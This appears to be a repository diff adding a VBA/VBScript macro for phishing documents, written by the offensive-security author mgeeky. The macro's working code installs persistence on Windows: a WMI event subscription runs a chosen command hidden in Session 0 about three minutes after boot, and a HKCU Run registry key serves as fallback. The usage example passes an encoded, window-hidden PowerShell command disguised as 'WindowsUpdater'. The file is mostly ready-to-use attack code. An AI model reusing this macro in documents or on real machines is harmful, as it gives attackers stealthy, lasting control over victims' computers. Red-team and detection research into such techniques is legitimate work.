phishing/vba-windows-persistence.vbs Normal file
View File

@ -0,0 +1,105 @@
'
' SYNOPSIS:
' This macro implements two windows persistence methods:
' - WMI Event Filter object creation
' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64
'
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WindowsPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.Name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.Query = Query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.Name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function
Public Function RegistryPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
On Error GoTo Failed
Const HKEY_CURRENT_USER = &H80000001
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strComputer = "."
Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strValueName = taskName
strValue = exePath
objReg.SetExpandedStringValue HKEY_CURRENT_USER, strKeyPath, strValueName, strValue
RegistryPersistence = True
Exit Function
Failed:
RegistryPersistence = False
End Function
Public Function WindowsPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
If WMIPersistence(exePath, taskName) <> True Then
RegistryPersistence exePath, taskName
End If
End Function

BIN
phishing/warnings/EN-Excel.docx Normal file
View File

Binary file not shown.

BIN
phishing/warnings/EN-Word.docx Normal file
View File

Binary file not shown.